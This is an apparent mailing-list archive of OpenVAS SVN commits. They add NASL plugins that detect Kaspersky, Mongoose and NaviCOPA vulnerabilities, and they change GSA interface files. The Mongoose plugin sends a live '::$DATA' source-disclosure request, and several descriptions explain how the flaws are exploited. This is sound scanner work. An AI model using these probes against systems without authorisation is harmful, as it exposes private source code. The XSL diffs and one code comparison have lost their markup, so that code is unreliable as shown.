(CET) Subject: [Openvas-commits] r6353 - in trunk/openvas-plugins: . scripts Message-ID: <20100109084517.134F88667D0F@pyrosoma.intevation.org> Author: chandra Date: 2010-01-09 09:45:14 +0100 (Sat, 09 Jan 2010) New Revision: 6353 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/conficker.nasl Log: Added comment about detection approach Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-08 17:57:40 UTC (rev 6352) +++ trunk/openvas-plugins/ChangeLog 2010-01-09 08:45:14 UTC (rev 6353) @@ -1,3 +1,7 @@ +2009-01-09 Chandrashekhar B + + * scripts/conficker.nasl: Added comment about detection approach. + 2009-12-14 Thomas Reinke * scripts/freebsd_pear-Net_Ping.nasl, Modified: trunk/openvas-plugins/scripts/conficker.nasl =================================================================== --- trunk/openvas-plugins/scripts/conficker.nasl 2010-01-08 17:57:40 UTC (rev 6352) +++ trunk/openvas-plugins/scripts/conficker.nasl 2010-01-09 08:45:14 UTC (rev 6353) @@ -55,7 +55,10 @@ visible to the user. Such registry entries are under, 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost' and 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RANDOM_SERVICE_NAME' - + + The plugin determines Conficker variants B or C. It likeley works against systems + that allow anonymous login, otherwise Credentials can be supplied. + Impact: Successful exploitation could allow remote attackers to take complete control of an affected system and capable of stealing all kind of sensitive information and can even spread accross the Network. @@ -66,7 +69,7 @@ Microsoft Windows 2K Service Pack 4 and prior. Microsoft Windows XP Service Pack 3 and prior. Microsoft Windows 2003 Service Pack 2 and prior. - + Fix: Run Windows Update and update the listed hotfixes or download and update mentioned hotfixes in the advisory from the below link, http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx From scm-commit at wald.intevation.org Sat Jan 9 13:17:59 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Sat, 9 Jan 2010 13:17:59 +0100 (CET) Subject: [Openvas-commits] r6354 - in trunk/openvas-plugins: . scripts Message-ID: <20100109121759.F016486607BC@pyrosoma.intevation.org> Author: chandra Date: 2010-01-09 13:17:56 +0100 (Sat, 09 Jan 2010) New Revision: 6354 Added: trunk/openvas-plugins/scripts/gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl trunk/openvas-plugins/scripts/gb_mongoose_server_info_disc_vuln.nasl trunk/openvas-plugins/scripts/gb_navicopa_server_detect.nasl trunk/openvas-plugins/scripts/gb_navicopa_server_info_disc_vuln.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/cpe.inc trunk/openvas-plugins/scripts/gb_kaspersky_av_detect.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-09 08:45:14 UTC (rev 6353) +++ trunk/openvas-plugins/ChangeLog 2010-01-09 12:17:56 UTC (rev 6354) @@ -1,5 +1,14 @@ 2009-01-09 Chandrashekhar B + * scripts/gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl, + scripts/gb_kaspersky_av_detect.nasl, + scripts/gb_mongoose_server_info_disc_vuln.nasl, + scripts/gb_navicopa_server_info_disc_vuln.nasl, + scripts/gb_navicopa_server_detect.nasl: + Added new plugins. + +2009-01-09 Chandrashekhar B + * scripts/conficker.nasl: Added comment about detection approach. 2009-12-14 Thomas Reinke Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-09 08:45:14 UTC (rev 6353) +++ trunk/openvas-plugins/cve_current.txt 2010-01-09 12:17:56 UTC (rev 6354) @@ -473,3 +473,7 @@ 37638 Greenbone svn R CVE-2009-4010 Greenbone svn R CVE-2009-4009 Greenbone svn R +CVE-2009-4452 SecPod svn L +CVE-2009-4529 SecPod svn R +CVE-2009-4530 SecPod svn R +CVE-2009-4535 SecPod svn R Modified: trunk/openvas-plugins/scripts/cpe.inc =================================================================== --- trunk/openvas-plugins/scripts/cpe.inc 2010-01-09 08:45:14 UTC (rev 6353) +++ trunk/openvas-plugins/scripts/cpe.inc 2010-01-09 12:17:56 UTC (rev 6354) @@ -771,7 +771,8 @@ "Ruby/Win/Ver", "^([0-9.]+([a-z0-9]+)?)", "cpe:/a:ruby-lang:ruby:", "www/*/Valarsoft/Webmatic", "^([0-9.]+)", "cpe:/a:valarsoft:webmatic:", "www/*/SQL-Ledger", "^([0-9.]+)","cpe:/a:sql-ledger:sql-ledger:", -"www/*/PHP-Calendar", "^([0-9.]+)", "cpe:/a:php-calendar:php-calendar:" +"www/*/PHP-Calendar", "^([0-9.]+)", "cpe:/a:php-calendar:php-calendar:", +"NaviCOPA/*/Ver", "^([0-9.]+)", "cpe:/a:intervations:navicopa_web_server:" ); Modified: trunk/openvas-plugins/scripts/gb_kaspersky_av_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_kaspersky_av_detect.nasl 2010-01-09 08:45:14 UTC (rev 6353) +++ trunk/openvas-plugins/scripts/gb_kaspersky_av_detect.nasl 2010-01-09 12:17:56 UTC (rev 6354) @@ -7,6 +7,10 @@ # Authors: # Sujit Ghosal # +# Updated to detect Kaspersky Internet Security and Anti-Virus for +# Windows File Servers. +# By - Nikita MR on 2010-01-06 +# # Copyright: # Copyright (c) 2009 Intevation GmbH, http//intevation.net # @@ -27,7 +31,7 @@ if(description) { script_id(800241); - script_version("$Revision: 1.0 $"); + script_version("$Revision$: 1.1"); script_name("Kaspersky AntiVirus Version Detection"); desc = " Overview : This script finds the installed Kaspersky AntiVirus and @@ -61,22 +65,48 @@ key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; foreach item (registry_enum_keys(key:key)) { - if(registry_get_sz(key:key + item, item:"DisplayName") =~ - "Kaspersky Anti-Virus [0-9.]+ for Windows Workstations") + prdtName = registry_get_sz(key:key + item, item:"DisplayName"); + + if("Kaspersky" >< prdtName) { - kavwVer = registry_get_sz(key:key + item, item:"DisplayVersion"); - if(kavwVer != NULL){ - set_kb_item(name:"Kaspersky/AV-Workstation/Ver", value:kavwVer); + # Check for Kaspersky Anti-Virus for Windows Workstations. + if("Anti-Virus" >< prdtName && "Windows Workstations" >< prdtName) + { + kavwVer = registry_get_sz(key:key + item, item:"DisplayVersion"); + if(kavwVer != NULL){ + set_kb_item(name:"Kaspersky/AV-Workstation/Ver", value:kavwVer); + } + exit(0); } - exit(0); - } - if(registry_get_sz(key:key + item, item:"DisplayName") =~ - "Kaspersky Anti-Virus [0-9.]+") - { - kavVer = registry_get_sz(key:key + item, item:"DisplayVersion"); - if(kavVer != NULL){ - set_kb_item(name:"Kaspersky/AV/Ver", value:kavVer); + + # Check for Kaspersky Anti-Virus for Windows File Servers. + if("Anti-Virus" >< prdtName && "File Servers" >< prdtName) + { + kavsVer = registry_get_sz(key:key + item, item:"DisplayVersion"); + if(kavsVer != NULL){ + set_kb_item(name:"Kaspersky/AV-FileServer/Ver", value:kavsVer); + } + exit(0); } - exit(0); + + # Check for Kaspersky Anti-Virus. + if(prdtName =~ "Kaspersky Anti-Virus [0-9]+") + { + kavVer = registry_get_sz(key:key + item, item:"DisplayVersion"); + if(kavVer != NULL){ + set_kb_item(name:"Kaspersky/AV/Ver", value:kavVer); + } + exit(0); + } + + # Check for Kaspersky Internet Security. + if("Internet Security" >< prdtName) + { + kisVer = registry_get_sz(key:key + item, item:"DisplayVersion"); + if(kisVer != NULL){ + set_kb_item(name:"Kaspersky/IntNetSec/Ver", value:kisVer); + } + exit(0); + } } } Property changes on: trunk/openvas-plugins/scripts/gb_kaspersky_av_detect.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl 2010-01-09 08:45:14 UTC (rev 6353) +++ trunk/openvas-plugins/scripts/gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl 2010-01-09 12:17:56 UTC (rev 6354) @@ -0,0 +1,127 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl 6464 2010-01-06 12:34:29Z jan $ +# +# Kaspersky Products Privilege Escalation Vulnerability +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800979); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4452"); + script_bugtraq_id(37354); + script_name("Kaspersky Products Privilege Escalation Vulnerability"); + desc = " + Overview: This host is installed with Kaspersky Products and is prone + to Privilege Escalation vulnerability. + + Vulnerability Insight: + This flaw occurs due to insecure permissions (Everyone/Full Control) + applied on the BASES folder which contains configuration files, + antivirus bases and executable modules. + + Impact: + Local attackers can exploit this issue to replace some files (.kdl files) + by malicious file (corrupted .dll files) and execute arbitrary code with + SYSTEM privileges. + + Impact Level: System/Application + + Affected Software/OS: + Kaspersky Anti-Virus 7, 2009, 2009 prior to 9.0.0.736 + Kaspersky Internet Security 7, 2009, 2009 prior to 9.0.0.736 + Kaspersky Anti-Virus 5.0, 6.0 for Windows Workstations prior to 6.0.4.1212 + Kaspersky Anti-Virus 6.0 for Windows File Servers prior to 6.0.4.1212 + + Fix: Upgrade to latest version of appropriate product, + Kaspersky Anti-Virus/Internet Security 2009 (9.0.0.736) + Kaspersky Anti-Virus for Windows Workstations/File Servers 6.0 (6.0.4.1212) + For Updates, Refer http://www.kaspersky.com/productupdates + + References: + http://secunia.com/advisories/37398 + http://www.vupen.com/english/advisories/2009/3573 + http://www.securityfocus.com/archive/1/archive/1/508508/100/0/threaded + + CVSS Score: + CVSS Base Score : 6.8 (AV:L/AC:L/Au:SI/C:C/I:C/A:C) + CVSS Temporal Score : 5.0 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of Kaspersky Products"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Privilege escalation"); + script_dependencies("gb_kaspersky_av_detect.nasl"); + script_require_keys("Kaspersky/AV/Ver", "Kaspersky/AV-Workstation/Ver", + "Kaspersky/IntNetSec/Ver", "Kaspersky/AV-FileServer/Ver"); + exit(0); +} + + +include("version_func.inc"); + +# For Kaspersky AntiVirus +kavVer = get_kb_item("Kaspersky/AV/Ver"); +if(kavVer != NULL) +{ + if(version_is_less(version:kavVer, test_version:"9.0.0.736")) + { + security_warning(0); + exit(0); + } +} + +# For Kaspersky Internet Security +kisVer = get_kb_item("Kaspersky/IntNetSec/Ver"); +if(kisVer != NULL) +{ + if(version_is_less(version:kisVer, test_version:"9.0.0.736")) + { + security_warning(0); + exit(0); + } +} + +# For Kaspersky Anti-Virus for Windows Workstations +kavwVer = get_kb_item("Kaspersky/AV-Workstation/Ver"); +if(kavwVer != NULL) +{ + if(version_is_less(version:kavwVer, test_version:"6.0.4.1212")) + { + security_warning(0); + exit(0); + } +} + +# For Kaspersky Anti-Virus for Windows File Servers +kavfsVer = get_kb_item("Kaspersky/AV-FileServer/Ver"); +if(kavfsVer != NULL) +{ + if(version_is_less(version:kavfsVer, test_version:"6.0.4.1212")) + { + security_warning(0); + exit(0); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl ___________________________________________________________________ Name: svn:executable + * Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_mongoose_server_info_disc_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_mongoose_server_info_disc_vuln.nasl 2010-01-09 08:45:14 UTC (rev 6353) +++ trunk/openvas-plugins/scripts/gb_mongoose_server_info_disc_vuln.nasl 2010-01-09 12:17:56 UTC (rev 6354) @@ -0,0 +1,96 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_mongoose_server_info_disc_vuln.nasl 6538 2010-01-08 17:29:24Z jan $ +# +# Mongoose Web Server Source Code Disclosure Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800412); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4530", "CVE-2009-4535"); + script_name("Mongoose Web Server Source Code Disclosure Vulnerability"); + desc = " + Overview: The host is running Mongoose Web Server and is prone to Source Code + Disclosure vulnerability. + + Vulnerability Insight: + The issue is caused due to an error within the handling of HTTP requests and + can be exploited to disclose the source code of certain scripts (e.g. PHP) by + appending '::$DATA' or '/' to a URI. + + Impact: + Successful exploitation will allow remote attackers to display the source code + of arbitrary files instead of an expected HTML response + + Impact Level: Application + + Affected Software/OS: + Mongoose Web Server version 2.8 and prior on windows. + + Fix: + No solution or patch is available as on 08th january, 2010. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://code.google.com/p/mongoose/ + + References: + http://freetexthost.com/0lcsrgt3vw + http://secunia.com/advisories/36934 + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) + CVSS Temporal Score : 4.5 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for version of Mongoose Web Server"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Web Servers"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80, 8080); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); + +moPort = 80; +if(!get_port_state(moPort)) +{ + moPort = 8080 ; + if(!get_port_state(moPort)){ + exit(0); + } +} + +if(!safe_checks()) +{ + sndReq= http_get(item:"/index.php::$DATA", port:moPort); + rcvRes = http_keepalive_send_recv(port:moPort, data:sndReq); + if(!isnull(rcvRes) && "< rcvRes && "?>" >< rcvRes){ + security_warning(moPort); + } +} + Property changes on: trunk/openvas-plugins/scripts/gb_mongoose_server_info_disc_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_navicopa_server_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_navicopa_server_detect.nasl 2010-01-09 08:45:14 UTC (rev 6353) +++ trunk/openvas-plugins/scripts/gb_navicopa_server_detect.nasl 2010-01-09 12:17:56 UTC (rev 6354) @@ -0,0 +1,67 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_navicopa_server_detect.nasl 6539 2010-01-05 14:00:08Z jan $ +# +# NaviCOPA Server Version Detection +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801100); + script_version("$Revision$: 1.0"); + script_name("NaviCOPA Server Version Detection"); + desc = " + Overview : This script detects the version of installed NaviCOPA Server + and saves the result in KB. + + Risk factor : Informational"; + + script_description(desc); + script_family("Service detection"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_summary("Set the version of NaviCOPA Server"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www",80); + exit(0); +} + + +include("http_func.inc"); + +httpPort = get_kb_item("Services/www"); +if(!httpPort){ + httpPort = 80; +} + +if(!get_port_state(httpPort)){ + exit(0); +} + +banner = get_http_banner(port:httpPort); +if("NaviCOPA" >< banner) +{ + ncpaVer = eregmatch(pattern:"Version ([0-9.]+)", string:banner); + if(!isnull(ncpaVer[1])){ + set_kb_item(name:"NaviCOPA/" + httpPort + "/Ver", value:ncpaVer[1]); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_navicopa_server_detect.nasl ___________________________________________________________________ Name: svn:executable + * Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_navicopa_server_info_disc_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_navicopa_server_info_disc_vuln.nasl 2010-01-09 08:45:14 UTC (rev 6353) +++ trunk/openvas-plugins/scripts/gb_navicopa_server_info_disc_vuln.nasl 2010-01-09 12:17:56 UTC (rev 6354) @@ -0,0 +1,94 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_navicopa_server_info_disc_vuln.nasl 6539 2010-01-05 17:29:24Z jan $ +# +# NaviCOPA Web Server Source Code Disclosure Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800411); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4529"); + script_name("NaviCOPA Web Server Source Code Disclosure Vulnerability"); + desc = " + Overview: The host is running NaviCOPA Web Server and is prone to Source Code + Disclosure vulnerability. + + Vulnerability Insight: + This issue is caused by an error when handling requests with the '%20' string + appended to the file extension. + + Impact: + Successful exploitation will allow remote attackers to display the source code + of arbitrary files (e.g. PHP) instead of an expected HTML response. + + Impact Level: Application + + Affected Software/OS: + NaviCOPA Web Server version 3.0.1.2 and prior on windows. + + Fix: + No solution or patch is available as on 05th january 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.navicopa.com/download.html + + References: + http://secunia.com/advisories/37014 + http://xforce.iss.net/xforce/xfdb/53799 + http://www.vupen.com/english/advisories/2009/2927 + http://www.packetstormsecurity.org/0910-exploits/navicopa-disclose.txt + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) + CVSS Temporal Score : 4.5 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for version of NaviCOPA Web Server"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Web Servers"); + script_dependencies("gb_navicopa_server_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +ncpaPort = get_http_port(default:80); +if(!ncpaPort){ + exit(0); +} + +#Grep for KB Value +ncpaVer = get_kb_item("NaviCOPA/" + ncpaPort + "/Ver"); +if(isnull(ncpaVer)){ + exit(0); +} + +#check for the NaviCOPA verison 3.0.1.2 (3.01.2) +if(version_is_less_equal(version:ncpaVer, test_version:"3.01.2")){ + security_warning(ncpaPort); +} Property changes on: trunk/openvas-plugins/scripts/gb_navicopa_server_info_disc_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Name: svn:keywords + Revision From scm-commit at wald.intevation.org Sat Jan 9 19:25:17 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Sat, 9 Jan 2010 19:25:17 +0100 (CET) Subject: [Openvas-commits] r6355 - in trunk/gsa: . src/html/src Message-ID: <20100109182517.66A9086607B4@pyrosoma.intevation.org> Author: mattm Date: 2010-01-09 19:25:16 +0100 (Sat, 09 Jan 2010) New Revision: 6355 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/omp.xsl Log: * src/html/src/omp.xsl (get_system_reports): Add failure message. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-09 12:17:56 UTC (rev 6354) +++ trunk/gsa/ChangeLog 2010-01-09 18:25:16 UTC (rev 6355) @@ -1,3 +1,7 @@ +2010-01-09 Matthew Mundell + + * src/html/src/omp.xsl (get_system_reports): Add failure message. + 2010-01-08 Matthew Mundell * src/html/src/help/performance.htm4: New file. Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-09 12:17:56 UTC (rev 6354) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-09 18:25:16 UTC (rev 6355) @@ -4097,7 +4097,29 @@ - + + + + + Get System Reports + + + + + + + + + There was an error getting the performance results. Please ensure that + there is a system reporting program installed with the Manager, and that + this program is configured correctly. + + + + + + + From scm-commit at wald.intevation.org Sat Jan 9 21:55:29 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Sat, 9 Jan 2010 21:55:29 +0100 (CET) Subject: [Openvas-commits] r6356 - in trunk/gsa: . src/html/src src/html/src/help Message-ID: <20100109205529.440DA865F497@pyrosoma.intevation.org> Author: mattm Date: 2010-01-09 21:55:28 +0100 (Sat, 09 Jan 2010) New Revision: 6356 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/gsa-style.css trunk/gsa/src/html/src/help/reports.htm4 trunk/gsa/src/html/src/omp.xsl Log: * src/html/src/gsa-style.css (small_inline_form): New style. * src/html/src/omp.xsl (html-task-table): Neaten indentation. Put the form inside a small_inline_form div. Remove the font-size and display styles from the form and select. (html-create-escalator-form): Alternate background colours of rows. (create_config_response): Only print details if a config was created and there's a config/name in the response. * src/html/src/help/reports.htm4: Correct phrase. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-09 18:25:16 UTC (rev 6355) +++ trunk/gsa/ChangeLog 2010-01-09 20:55:28 UTC (rev 6356) @@ -1,5 +1,18 @@ 2010-01-09 Matthew Mundell + * src/html/src/gsa-style.css (small_inline_form): New style. + + * src/html/src/omp.xsl (html-task-table): Neaten indentation. Put the + form inside a small_inline_form div. Remove the font-size and display + styles from the form and select. + (html-create-escalator-form): Alternate background colours of rows. + (create_config_response): Only print details if a config was created and + there's a config/name in the response. + + * src/html/src/help/reports.htm4: Correct phrase. + +2010-01-09 Matthew Mundell + * src/html/src/omp.xsl (get_system_reports): Add failure message. 2010-01-08 Matthew Mundell Modified: trunk/gsa/src/html/src/gsa-style.css =================================================================== --- trunk/gsa/src/html/src/gsa-style.css 2010-01-09 18:25:16 UTC (rev 6355) +++ trunk/gsa/src/html/src/gsa-style.css 2010-01-09 20:55:28 UTC (rev 6356) @@ -410,6 +410,14 @@ font-size:10px; } +#small_inline_form select, #small_inline_form input { + font-size: 10px; +} + +#small_inline_form form { + display: inline; +} + .threat_info_table { text-align:right; } Modified: trunk/gsa/src/html/src/help/reports.htm4 =================================================================== --- trunk/gsa/src/html/src/help/reports.htm4 2010-01-09 18:25:16 UTC (rev 6355) +++ trunk/gsa/src/html/src/help/reports.htm4 2010-01-09 20:55:28 UTC (rev 6356) @@ -22,7 +22,7 @@

            Reports

            -This table provides on overview on all +This table provides an overview of all reports for the selected task (see Task Summary box).

            Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-09 18:25:16 UTC (rev 6355) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-09 20:55:28 UTC (rev 6356) @@ -46,50 +46,54 @@
            Tasks - - - - - - -
            - - - -
            + + + + + + +
            +
            + + + +
            +
            @@ -1779,7 +1783,7 @@
            - + - + - + + + + + even + odd + + + + + + + + @@ -322,6 +381,38 @@ + + + + + + + + Edit Settings + + + + + + + + + + + + + + + + + + + + + + + + From scm-commit at wald.intevation.org Fri Jan 15 10:29:44 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 15 Jan 2010 10:29:44 +0100 (CET) Subject: [Openvas-commits] r6414 - in trunk/openvas-plugins: . scripts Message-ID: <20100115092944.073D886607A1@pyrosoma.intevation.org> Author: chandra Date: 2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010) New Revision: 6414 Added: trunk/openvas-plugins/scripts/gb_RHSA-2010_0002-01_PyXML.nasl trunk/openvas-plugins/scripts/gb_RHSA-2010_0003-01_gd.nasl trunk/openvas-plugins/scripts/gb_RHSA-2010_0018-01_dbus.nasl trunk/openvas-plugins/scripts/gb_RHSA-2010_0019-01_kernel.nasl trunk/openvas-plugins/scripts/gb_RHSA-2010_0020-01_kernel.nasl trunk/openvas-plugins/scripts/gb_fedora_2009_11880_gimp_fc11.nasl trunk/openvas-plugins/scripts/gb_fedora_2009_12560_cacti_fc12.nasl trunk/openvas-plugins/scripts/gb_fedora_2009_13157_automake_fc12.nasl trunk/openvas-plugins/scripts/gb_fedora_2009_13539_krb5_fc12.nasl trunk/openvas-plugins/scripts/gb_fedora_2009_13551_slim_fc11.nasl trunk/openvas-plugins/scripts/gb_fedora_2009_13552_slim_fc12.nasl trunk/openvas-plugins/scripts/gb_fedora_2009_13642_NetworkManager_fc11.nasl trunk/openvas-plugins/scripts/gb_fedora_2010_0012_stardict_fc12.nasl trunk/openvas-plugins/scripts/gb_fedora_2010_0209_pdns-recursor_fc11.nasl trunk/openvas-plugins/scripts/gb_fedora_2010_0213_condor_fc12.nasl trunk/openvas-plugins/scripts/gb_fedora_2010_0227_condor_fc11.nasl trunk/openvas-plugins/scripts/gb_fedora_2010_0228_pdns-recursor_fc12.nasl trunk/openvas-plugins/scripts/gb_fedora_2010_0295_ImageMagick_fc11.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_001.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_002.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_003.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_004.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_005.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_006.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_007.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_008.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_009.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_010.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_011.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_012.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_013.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_014.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_015.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_016.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_017.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVA_2010_018.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_220_1.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_227_1.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_241_1.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_293_1.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_300_1.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_300_2.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_316_1.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_316_2.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2009_316_3.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2010_000.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2010_001.nasl trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2010_002.nasl trunk/openvas-plugins/scripts/gb_suse_2010_001.nasl trunk/openvas-plugins/scripts/gb_ubuntu_USN_876_1.nasl trunk/openvas-plugins/scripts/gb_ubuntu_USN_877_1.nasl trunk/openvas-plugins/scripts/gb_ubuntu_USN_878_1.nasl trunk/openvas-plugins/scripts/gb_ubuntu_USN_879_1.nasl trunk/openvas-plugins/scripts/gb_ubuntu_USN_880_1.nasl Modified: trunk/openvas-plugins/ChangeLog Log: Addded new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/ChangeLog 2010-01-15 09:29:41 UTC (rev 6414) @@ -1,3 +1,61 @@ +2010-01-14 Chandrashekhar B + + * 